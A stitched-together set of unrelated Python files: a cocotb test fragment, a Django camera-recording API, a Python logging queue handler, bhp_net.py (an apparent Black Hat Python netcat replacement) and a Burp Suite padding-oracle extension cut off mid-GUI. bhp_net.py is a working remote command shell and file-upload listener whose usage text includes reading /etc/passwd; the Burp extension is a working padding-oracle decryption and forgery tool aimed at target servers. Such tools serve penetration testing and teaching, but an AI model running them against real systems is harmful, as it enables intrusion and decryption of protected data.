raised = False
@cocotb.function
async def func():
nonlocal func_started
func_started = True
await Timer(10, units="ns")
def function_caller():
nonlocal raised
nonlocal caller_resumed
try:
func()
except RuntimeError:
raised = True
finally:
caller_resumed = True
@external
def ext():
t = threading.Thread(target=function_caller)
t.start()
t.join()
task = cocotb.start_soon(ext())
await Timer(20, units="ns")
assert caller_resumed, "Caller was never resumed"
assert not func_started, "Function should never have started"
assert raised, "No exception was raised to warn the user"
await task.join()
@cocotb.test()
async def test_function_called_in_parallel(dut):
"""
Test that the same `@function` can be called from two parallel background
threads.
"""
@cocotb.function
async def function(x):
await Timer(1, units="ns")
return x
@cocotb.external
def call_function(x):
return function(x)
t1 = cocotb.start_soon(call_function(1))
t2 = cocotb.start_soon(call_function(2))
v1 = await t1
v2 = await t2
assert v1 == 1, v1
assert v2 == 2, v2
|
views.py | from .models import Camera,Recording
from .serializers import RecordingSerializer,CameraSerializer
from django.views.decorators.csrf import csrf_exempt
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .recorder import startRecording
import threading
import datetime,os
from django.conf import settings
'''This is the path of the directory where all the recordings will be saved'''
PATH = os.path.join(settings.BASE_DIR,"allRecordings")
PATH = PATH.replace("\\","/")
'''function for starting recording from a given camera'''
@api_view(['PUT'])
def start(request):
name=request.data.get('name',None)
if name is not None:
try:
camera = Camera.objects.get(name=name)
except Camera.DoesNotExist:
return Response("camera not found")
check = CameraSerializer(camera)
if check.data.get("status"):
return Response({"Success":"Camera is already runnig"})
serializer = CameraSerializer(camera,data ={"status":True},partial=True)
if serializer.is_valid():
serializer.save()
date = str(str(datetime.datetime.now()).split()[0])
Time = "Time_"+str(str(datetime.datetime.now().hour))+"_Date_"+date
if addpath(name,Time):
t = threading.Thread(target=startRecording,args=(name,check.data.get("url"),str(Time)))
t.start()
return Response("{name} is Started".format(name=name))
else:
return Response("{name} is not Started".format(name=name))
return Response("{name} is Started".format(name=name))
else:
return Response({"error":serializer.errors})
else:
return Response("camera not found")
'''function for stopping recording from a given camera'''
@api_view(['PUT'])
def stop(request):
name=request.data.get('name',None)
if name is not None:
try:
camera = Camera.objects.get(name=name)
except Camera.DoesNotExist:
return Response("camera not found")
serializer = CameraSerializer(camera,data ={"status":False},partial=True)
if serializer.is_valid():
serializer.save()
return Response("{name} is Stopped".format(name=name))
else:
return Response({"error":serializer.errors})
else:
return Response("camera not found!")
'''function for retrieving the status of all cameras or a given camera'''
@api_view()
def health_check(request,Name=None):
if request.method =="GET":
pythondata = request.data
name = pythondata.get("name",None)
if Name and name is None:
name = Name
if name is not None and name!="all":
try:
camera = Camera.objects.get(name=name)
serializer = CameraSerializer(camera)
return Response(serializer.data)
except Camera.DoesNotExist:
return Response("invalid request")
elif name=="all":
camera = Camera.objects.all()
serializer = CameraSerializer(camera,many=True)
return Response(serializer.data)
else:
return Response("invalid request")
'''function to store a list of camera urls to database for recording'''
@csrf_exempt
@api_view(['POST'])
def store_urls(request):
if request.method =="POST":
pythondata = request.data
urls = pythondata.get("urls",None)
if urls is not None:
for i in urls:
try:
camera = Camera.objects.get(name=i.get('name'))
res = {"Error":"Camera url is already present, can't insert again"}
break
except Camera.DoesNotExist:
serializer = CameraSerializer(data = i)
if serializer.is_valid():
serializer.save()
res = {"Success":"Camera urls are stored"}
else:
res = {"Error":serializer.errors}
else:
res = {"Error":"data not passed by you"}
return Response(res)
'''retrive all recordings from database'''
@api_view(['GET'])
def getpath(request):
if request.method =="GET":
recording = Recording.objects.all()
serializer = RecordingSerializer(recording,many=True)
return Response(serializer.data)
'''function for getting valid and corrupted videos in dictionary format'''
@api_view(['GET'])
def corrupt_checker(request):
if request.method =="GET":
res = dict()
recording = Recording.objects.filter(status="valid")
serializer = RecordingSerializer(recording,many=True)
res["Good Videos"] = serializer.data
recording = Recording.objects.filter(status="corrupt")
serializer = RecordingSerializer(recording,many=True)
res["Corrupted Videos"] = serializer.data
return Response(res)
'''this function is called only from the start function; users cannot call it directly'''
def addpath(name,Time):
filename = name+"_"+str(Time)
global PATH
data = {"name":filename,"path":PATH+"/"+filename+".avi","status":"valid","datetime":Time}
serializer = RecordingSerializer(data = data)
if serializer.is_valid():
serializer.save()
res = {"Success":"recording Set"}
print(res)
return True
else:
res = {"Error":serializer.errors}
return False
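# Illustrative client calls (not part of the original source; the host and the
# "/api/" route prefix are assumptions — adjust to match your urls.py):
# import requests
# requests.put("http://localhost:8000/api/start/", data={"name": "cam1"})
# requests.put("http://localhost:8000/api/stop/", data={"name": "cam1"})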
|
bhp_net.py | import sys
import socket
import getopt
import threading
import subprocess
#global var
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def run_command(cmd):
"""runs a command and return the output
"""
cmd = cmd.rstrip()
try:
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
output = e.output
return output
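# e.g. (illustrative) run_command("echo hi") returns b"hi\n" on POSIX shells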
#handling incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
#check whether an upload destination was given
if len(upload_destination):
file_buffer = b""
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
try:
with open(upload_destination, "wb") as file_descriptor:
file_descriptor.write(file_buffer)
client_socket.send(f"Successfully saved file to {upload_destination}".encode("utf-8"))
except OSError as e:
client_socket.send(f"Failed to save file to {upload_destination} due to OS Error.\n Details: {e}".encode("utf-8"))
#check for command execution
if len(execute):
output = run_command(execute)
client_socket.send(output)
#check if a command shell is requested
if command:
while True:
client_socket.send("<BHP:#>".encode("utf-8"))
#open to reception until we grab a linefeed (== enter key)
cmd_buffer = b""
while b"\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#execute and send back results
response = run_command(cmd_buffer.decode("utf-8"))
client_socket.send(response)
#let's work on incoming connections:
def server_loop():
global target
global port
#if target undefined we listen to all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
#thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
#if we are not listening, we are a client. Then:
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
#if we detect input from stdin, we'll send it, if not we keep waiting
if len(buffer):
client.send(buffer.encode("utf-8"))
while True:
recv_len = 1
response = b""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print(response.decode("utf-8"), end=" ")
#wait for further input and then send it off
buffer = input("")
buffer += "\n"
client.send(buffer.encode("utf-8"))
except socket.error as e:
print(f"[*] Exception caught. Exiting.")
print(f"[*] Details of error: {e}")
client.close()
#the function that will print the instructions if an unknown input is entered
def usage_info():
print("Netcat Replacement")
print("")
print("Usage: bhp_net.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving a connection upload a file and write it to [destination]")
print("")
print("")
print("Examples:")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -c")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -u=c:\\target.exe")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' |./bhp_net.py -t 192.168.11.12 -p 135")
sys.exit()
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage_info()
#read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute=", "target=", "port=", "command", "upload="])
for o, a in opts:
if o in ("-h", "--help"):
usage_info()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled option"
except getopt.GetoptError as e:
print(str(e))
usage_info()
if not listen and len(target) and port >0:
#read the buffer from command line
#this is blocking, so if not sending input, unlock with CTRL-D
buffer = sys.stdin.read()
#send the data off
client_sender(buffer)
if listen:
server_loop()
main()
|
loghandler_33.py | #
# Copy/pasted from the Python 3.3 standard library, and distributed
# under the Python Software Foundation License.
#
import logging
import threading
import Queue
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except Queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except Queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
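# Minimal usage sketch (an addition, not part of the Python 3.3 original):
# producers log through a QueueHandler while a single QueueListener thread
# drains the queue into a real handler, as the docstrings above describe.
if __name__ == '__main__':
    q = Queue.Queue()
    root = logging.getLogger()
    root.setLevel(logging.INFO)
    root.addHandler(QueueHandler(q))      # producers only touch the queue
    console = logging.StreamHandler()
    console.setFormatter(logging.Formatter('%(levelname)s %(message)s'))
    listener = QueueListener(q, console)  # one background thread does the I/O
    listener.start()
    root.info('hello from the queue')
    listener.stop()                       # enqueue the sentinel and join the thread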
|
padding_oracle_hunter.py | from burp import IBurpExtender, IContextMenuFactory, ITab, IExtensionStateListener, IContextMenuInvocation, IHttpRequestResponse
from javax.swing import (JScrollPane, JPanel, JTabbedPane, JTextField, JLabel, JTextArea, JButton, JEditorPane, JMenuItem, JComboBox, JCheckBox, JOptionPane, JProgressBar, GroupLayout)
from java.lang import Short
from java.awt import Color
from binascii import hexlify, unhexlify
import re
import threading
import Queue
import random
import base64
import time
from collections import Counter, namedtuple
class BurpExtender(IBurpExtender, IContextMenuFactory, ITab, IExtensionStateListener):
# *************************************** PKCS#7 ***************************************
# global variables
gReqResPKCS7 = IHttpRequestResponse
gSelectedParamNamePKCS7 = ""
gHttpRequestStringPKCS7 = ""
gHttpRequestRawStringPKCS7 = ""
gPayloadPKCS7=""
gPayloadFormatPKCS7=""
gSelectedPayloadPKCS7=None
gThreadStopPKCS7=False
gOpThreadPKCS7 = None
gIsPayloadUrlEncodedPKCS7 = False
gresDictPKCS7={}
gPlaintextPKCS7 = ""
gBlockSizePKCS7 = ""
gThreadPKCS7 = ""
gPadMsgPKCS7 = ""
gPadMsgSelPKCS7 = ""
def DisplayOutput_PKCS7(self, text):
self.__jTextAreaOutputPKCS7.append(text)
def Worker_PKCS7(self, payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, PadMsg, start_byte, end_byte, mode, q):
for byteValue in range(start_byte,end_byte):
# Exit the operation if stop button was clicked
if(self.gThreadStopPKCS7):
return
# modify the block according to the padding value
mod_block = current_block[0:blockLen-(numOfPad*2)] + hex(byteValue).rstrip("L").replace('0x','').rjust(2,'0') + mod_byte
if(mode=="test"):
payload = encrypted_payload.replace(current_block, mod_block)
# send the web refresh request to check for oracle
result = self.ServiceRequest_PKCS7(payload)
ResInfo = self._helpers.analyzeResponse(result)
response = result[ResInfo.getBodyOffset():]
self.gresDictPKCS7[payload] = unhexlify(hexlify(response))
else:
if(mode=="enc"):
# dummy block to be appended to the encrypted block so that length is the same as the original payload
dummyblock = self.GetDummyBlock_PKCS7(blockLen *((payloadLen//blockLen)-2))
# send the web request
result = self.ServiceRequest_PKCS7(dummyblock + mod_block + encrypted_payload)
elif(mode=="dec"):
# send the web request
result = self.ServiceRequest_PKCS7(encrypted_payload.replace(current_block,mod_block))
# if the message is an invalid padding message
if self.gPadMsgSelPKCS7=="Invalid":
if (hexlify(PadMsg.encode()) not in hexlify(result)):
decb4xor = byteValue ^ numOfPad
q.put(decb4xor)
return
# if the message is a valid padding message
else:
if (hexlify(PadMsg.encode()) in hexlify(result)):
decb4xor = byteValue ^ numOfPad
q.put(decb4xor)
return
# return if the correct padding is already found
if(not q.empty()):
return
def ServiceRequest_PKCS7(self, encrypted_string):
try:
# Convert the payload back to the original format from hex
payload = self.ConvertFromHexToPayloadFormat(encrypted_string, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
if payload != None:
# Replace the #PAYLOAD# with the actual payload
newHttpRequest = self.gHttpRequestStringPKCS7.replace("#PAYLOAD#", payload)
# Update the http parameters
reqInfo = self._helpers.analyzeRequest(newHttpRequest)
headers = reqInfo.getHeaders()
param = newHttpRequest[reqInfo.getBodyOffset():]
newHttpRequest = self._helpers.buildHttpMessage(headers, param)
# Send the request
httpService = self.gReqResPKCS7.getHttpService()
res = self._callbacks.makeHttpRequest(self._helpers.buildHttpService(httpService.getHost(),httpService.getPort(), httpService.getProtocol() == "https"), newHttpRequest)
return res.getResponse()
except Exception as e:
return ""
def GetDummyBlock_PKCS7(self, length):
HexChar=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
DummyBlock=""
for i in range(0,length):
DummyBlock = DummyBlock + HexChar[random.randint(0,15)]
return DummyBlock
def Test_PKCS7(self, encrypted_string):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7)*2
payloadLen = len(encrypted_string)
nbOfBlock = payloadLen//blockLen
dummyblock = self.GetDummyBlock_PKCS7(blockLen*(nbOfBlock-1))
encrypted_payload = dummyblock + encrypted_string[-blockLen:]
current_block = encrypted_payload[-(blockLen*2):][0:blockLen]
self.gresDictPKCS7 = {}
# limit the number of threads to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, "", 1, "", start_byte_range, end_byte_range, "test", None))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, "", 1, "", start_byte_range, end_byte_range, "test", None))
threads.append(x)
x.start()
# wait until all threads are complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# check the padding responses
resCount = Counter(self.gresDictPKCS7.values())
if len(resCount)==2:
validPadRes = ""
invalidPadRes = ""
for response in resCount:
# if there is 1 unique response, it is likely the valid padding response
if(resCount[response]==1):
validPadRes = response
# there should be 255 identical responses for invalid padding
elif(resCount[response]==255):
invalidPadRes = response
# check and print the result
if(validPadRes!="" and invalidPadRes!=""):
self.__jTextAreaOutputPKCS7.setForeground(Color(255, 0, 0))
key_list = list(self.gresDictPKCS7.keys())
val_list = list(self.gresDictPKCS7.values())
# Retrieve the payload for invalid padding
invalidpad_payload = key_list[val_list.index(invalidPadRes)]
invalidpad_payload = self.ConvertFromHexToPayloadFormat(invalidpad_payload, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
# Retrieve the payload for valid padding
validpad_payload = key_list[val_list.index(validPadRes)]
validpad_payload = self.ConvertFromHexToPayloadFormat(validpad_payload, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
# Display the invalid padding response
self.DisplayOutput_PKCS7("**** Invalid Padding: ****\n")
self.DisplayOutput_PKCS7("Payload:\n{}\n".format(invalidpad_payload))
self.DisplayOutput_PKCS7("Response:\n{}\n\n".format(invalidPadRes))
# Display the valid padding response
self.DisplayOutput_PKCS7("**** Valid Padding: ****\n")
self.DisplayOutput_PKCS7("Payload:\n{}\n".format(validpad_payload))
self.DisplayOutput_PKCS7("Response:\n{}\n\n".format(validPadRes))
# Display the conclusion
self.DisplayOutput_PKCS7("The server is likely vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS7("The server is not vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS7("The server is not vulnerable to padding oracle attack\n")
# set progress bar to complete
self.__jProgressBarPKCS7.setValue(100)
self.__jProgressBarPKCS7.setString("Done")
def Encryption_PKCS7(self):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7) *2
plaintextblock = []
ciphertext=""
self.DisplayOutput_PKCS7("Encrypting plaintext: {}\n".format(self.gPlaintextPKCS7))
# limit the number of threads to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# compute the PKCS#7 padding length and padding string
padding_len = (len(self.gPlaintextPKCS7)//2)%int(self.gBlockSizePKCS7)
if(padding_len==0):
padding_len=int(self.gBlockSizePKCS7)
else:
padding_len = int(self.gBlockSizePKCS7) - padding_len
padding = (hex(padding_len).rstrip("L").replace('0x','').rjust(2,'0'))*padding_len
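# e.g. with a 16-byte block and 5 plaintext bytes (10 hex chars):
# padding_len = 16 - 5 = 11, so padding == '0b' * 11 (PKCS#7 pads with the pad length)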
msg_hex = self.gPlaintextPKCS7 + padding
payloadLen = len(msg_hex)
# store the plaintext as blocks
for index in range(len(msg_hex),0,-blockLen):
plaintextblock.append(msg_hex[index-blockLen:index])
# set last encrypted block with random bytes
last_encrypted_payload = self.GetDummyBlock_PKCS7(blockLen)
encrypted_payload = last_encrypted_payload
# store the last blocks as ciphertext
ciphertext = last_encrypted_payload
# Start computing the ciphertext
self.DisplayOutput_PKCS7('Computing Padding Oracle Encryption...\n')
self.DisplayOutput_PKCS7("Computed Blocks in Hexadecimal:\n")
self.DisplayOutput_PKCS7("block 1: {}\n".format(encrypted_payload))
for i in range(0,len(plaintextblock)):
decb4xorstring=""
mod_byte=""
current_block = self.GetDummyBlock_PKCS7(blockLen)
# number of byte for padding
for numOfPad in range(1,int(self.gBlockSizePKCS7)+1):
if(decb4xorstring!=""):
tmp_byte = (hex(numOfPad).rstrip("L").replace('0x','').rjust(2,'0'))*(numOfPad-1)
mod_byte = hex(int(tmp_byte,16) ^ int(decb4xorstring,16)).rstrip("L").replace('0x','').rjust((numOfPad-1)*2,'0')
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
q = Queue.Queue()
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "enc", q))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "enc", q))
threads.append(x)
x.start()
# wait until all threads complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# if the valid padding is found
if(not q.empty()):
decb4xor = q.get()
q.task_done()
decb4xorstring = hex(decb4xor).rstrip("L").replace('0x','').rjust(2,'0') + decb4xorstring
index = blockLen-(numOfPad*2)
ciphertext = hex(decb4xor ^ int(plaintextblock[i][index:index+2],16)).rstrip("L").replace('0x','').rjust(2,'0') + ciphertext
else:
self.DisplayOutput_PKCS7("\nUnable to find valid padding!\n")
return
# assign the newly recovered ciphertext block as the encrypted payload for the next round
encrypted_payload = ciphertext[0:blockLen]
self.DisplayOutput_PKCS7("block {}: {}\n".format(i+2,encrypted_payload))
# update the progress bar
progress = int((i+1)/float(len(plaintextblock))*100)
self.__jProgressBarPKCS7.setValue(progress)
# return the encrypted payload into the desired format
ciphertext = self.ConvertFromHexToPayloadFormat(ciphertext, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
if(ciphertext!=None):
# set progress bar to complete
self.__jProgressBarPKCS7.setString("Done")
# output the encrypted payload
self.DisplayOutput_PKCS7("\nencrypted payload:\n")
self.DisplayOutput_PKCS7("{}\n".format(ciphertext))
def Decryption_PKCS7(self, encrypted_string):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7)*2
plaintext=""
blocktext=""
payloadLen = len(encrypted_string)
nbOfBlock = payloadLen//blockLen
dummyblock = self.GetDummyBlock_PKCS7(blockLen*(nbOfBlock-1))
# iv = encrypted_string[0:blockLen]
blockCounter=1
self.DisplayOutput_PKCS7("Decrypting ciphertext: {}\n".format(self.gSelectedPayloadPKCS7))
# limit the number of threads to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# Start decryption
self.DisplayOutput_PKCS7("Computing Padding Oracle Decryption......\n")
self.DisplayOutput_PKCS7("Recovered Blocks in Hexadecimal:\n")
# Split into blocks (block n-1 is required to recover block n)
for block in range(nbOfBlock-2,-1,-1):
decb4xorstring=""
mod_byte=""
# number of byte for padding
for numOfPad in range(1,int(self.gBlockSizePKCS7)+1):
# Extract the current encrypted byte to be recovered
currentByte = encrypted_string[-(blockCounter*blockLen)-(numOfPad*2):][0:2]
# Prepare the payload
encrypted_payload = dummyblock + encrypted_string[(-blockCounter*blockLen):][0:blockLen]
# Extract the current working block
current_block = encrypted_payload[(-blockLen*2):][0:blockLen]
if(decb4xorstring!=""):
tmp_byte = (hex(numOfPad).rstrip("L").replace('0x','').rjust(2,'0'))*(numOfPad-1)
mod_byte = hex(int(tmp_byte,16) ^ int(decb4xorstring,16)).rstrip("L").replace('0x','').rjust((numOfPad-1)*2,'0')
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
q = Queue.Queue()
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "dec", q))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "dec", q))
threads.append(x)
x.start()
# wait until all threads complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# if the valid padding is found
if(not q.empty()):
decb4xor = q.get()
q.task_done()
decb4xorstring = hex(decb4xor).rstrip("L").replace('0x','').rjust(2,'0') + decb4xorstring
index = blockLen-(numOfPad*2)
blocktext = hex(decb4xor ^ int(currentByte,16)).rstrip("L").replace('0x','').rjust(2,'0') + blocktext
else:
self.DisplayOutput_PKCS7("\nUnable to find correct padding!\n")
return
plaintext = blocktext + plaintext
self.DisplayOutput_PKCS7("block {}: {}\n".format(blockCounter,blocktext))
blocktext=""
# update the progress bar
progress = int((blockCounter/float(nbOfBlock-1))*100)
self.__jProgressBarPKCS7.setValue(progress)
blockCounter = blockCounter+1
# set progress bar to complete
self.__jProgressBarPKCS7.setString("Done")
# output the plaintext
self.DisplayOutput_PKCS7("\nDecrypted plaintext:\n")
self.DisplayOutput_PKCS7("Hex: {}\n".format(plaintext))
self.DisplayOutput_PKCS7("Bytes: {}\n".format(unhexlify(plaintext)))
def InputValidation_PKCS7(self, mode):
try:
# Set default font display to black
self.__jTextAreaOutputPKCS7.setForeground(Color(0, 0, 0))
# make sure the previous thread has terminated
if self.gOpThreadPKCS7!=None and self.gOpThreadPKCS7.isAlive():
JOptionPane.showMessageDialog(self._jPaddingOracleTab,"Previous thread is still running! Please click the stop button to terminate it", "Warning", JOptionPane.WARNING_MESSAGE)
return False
# reset the variables
self.gThreadStopPKCS7 = False
self.__jTextAreaOutputPKCS7.setText("")
self.__jProgressBarPKCS7.setValue(0)
self.__jProgressBarPKCS7.setString("")
self.__jProgressBarPKCS7.setStringPainted(True)
# check if the payload is selected
if self.gSelectedPayloadPKCS7==None:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Incorrect payload selection!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# Get plaintext for encryption operation
if mode=="encrypt":
plaintext_string = re.sub('\W+','', self.__textPlaintextPKCS7.getText())
if plaintext_string=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the plaintext in hexadecimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# check whether the plaintext is hexadecimal value
unhexlify(plaintext_string.encode())
self.gPlaintextPKCS7 = plaintext_string
# Get block size
blocksize = re.sub('\W+','', self.__textBlockSizePKCS7.getText())
if blocksize=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide a valid block size in byte!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gBlockSizePKCS7 = blocksize
# Get the number of threads
thread = re.sub('\W+','',self.__textThreadPKCS7.getText())
if thread=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide a valid thread number!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gThreadPKCS7 = thread
# Only used in the encryption or decryption operations
if mode!="test":
# Get valid or invalid padding message
self.gPadMsgSelPKCS7 = self.__jComboBoxPadMsgPKCS7.getSelectedItem()
PadMsg = self.__textPadMessagePKCS7.getText()
if PadMsg=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide part or full of the valid or invalid padding response!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gPadMsgPKCS7 = PadMsg
return True
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return False
def setGUI_PKCS7(self):
self.__jPanelPKCS7 = JPanel()
jPanelLayoutPKCS7 = GroupLayout(self.__jPanelPKCS7)
self.__jPanelPKCS7.setLayout(jPanelLayoutPKCS7)
jPanelLayoutPKCS7.setAutoCreateGaps(True)
jPanelLayoutPKCS7.setAutoCreateContainerGaps(True)
self.__jLabelReqPKCS7 = JLabel("Request")
self.__jScrollPaneReqPKCS7 = JScrollPane()
self.__jEditorPaneReqPKCS7 = JEditorPane()
self.__jEditorPaneReqPKCS7.setEditable(False)
self.__jScrollPaneReqPKCS7.setViewportView(self.__jEditorPaneReqPKCS7)
self.__jLabelThreadPKCS7 = JLabel("Thread:")
self.__textThreadPKCS7 = JTextField("1")
self.__textThreadPKCS7.setToolTipText("number of threads")
self.__jLabelBlockSizePKCS7 = JLabel("Block Size:")
self.__textBlockSizePKCS7 = JTextField("16")
self.__textBlockSizePKCS7.setToolTipText("block size (byte)")
self.__jLabelPadMessagePKCS7 = JLabel("Padding Response:")
self.__textPadMessagePKCS7 = JTextField()
self.__textPadMessagePKCS7.setToolTipText("part or all of the valid or invalid padding response, only used in the encryption and decryption operations")
